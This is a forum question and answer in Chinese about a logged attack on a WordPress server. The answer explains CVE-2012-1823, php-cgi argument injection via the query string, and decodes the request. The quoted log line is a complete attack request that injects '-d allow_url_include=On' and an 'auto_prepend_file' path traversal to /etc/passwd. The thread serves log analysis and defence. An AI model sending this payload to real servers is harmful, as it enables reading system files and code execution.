有人試圖入侵我的網站,想了解日誌
我有一個託管在 CentOS 6 上的 wordpress 站點。看到以下訪問日誌後,我檢查了伺服器,似乎還可以。誰能解釋一下這個人想做什麼?他們得到了他們想要的嗎?
我已禁用 allow_url_include,並將 open_basedir 限制為 web dir 和 tmp(/etc 不在路徑中)。
190.26.208.130 - - [05/Sep/2012:21:24:42 -0700] "POST http://my_ip/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1" 200 32656 "-" "Mozilla/5.0"
先看看CVE-2012-1823。
上面的 URL 被解碼為:
http://my_ip/?-d allow_url_include=On+-d auto_prepend_file=../../../../../../../../../../../../etc/passwd� -n/?-d allow_url_include=On+-d auto_prepend_file=../../../../../../../../../../../../etc/passwd� -n
?-d allow_url_include=On
:他試圖在 php-cgi 呼叫中添加一個額外的參數:$ php-cgi -h Usage: php [-q] [-h] [-s] [-v] [-i] [-f <file>] php <file> [args...] -d foo[=bar] Define INI entry foo with value 'bar'
+-d auto_prepend_file=../../../../../../../../../../../../etc/passwd� -n
:然後將他的文件添加為要執行的程式碼。不知道他為什麼在這裡使用路徑遍歷攻擊而不是使用他的程式碼或php://input
.
-n
最後否定php.ini
:$ php-cgi -h Usage: php [-q] [-h] [-s] [-v] [-i] [-f <file>] php <file> [args...] -n No php.ini file will be used
PS:如果您沒有將 PHP 作為 CGI 腳本執行,則無需擔心。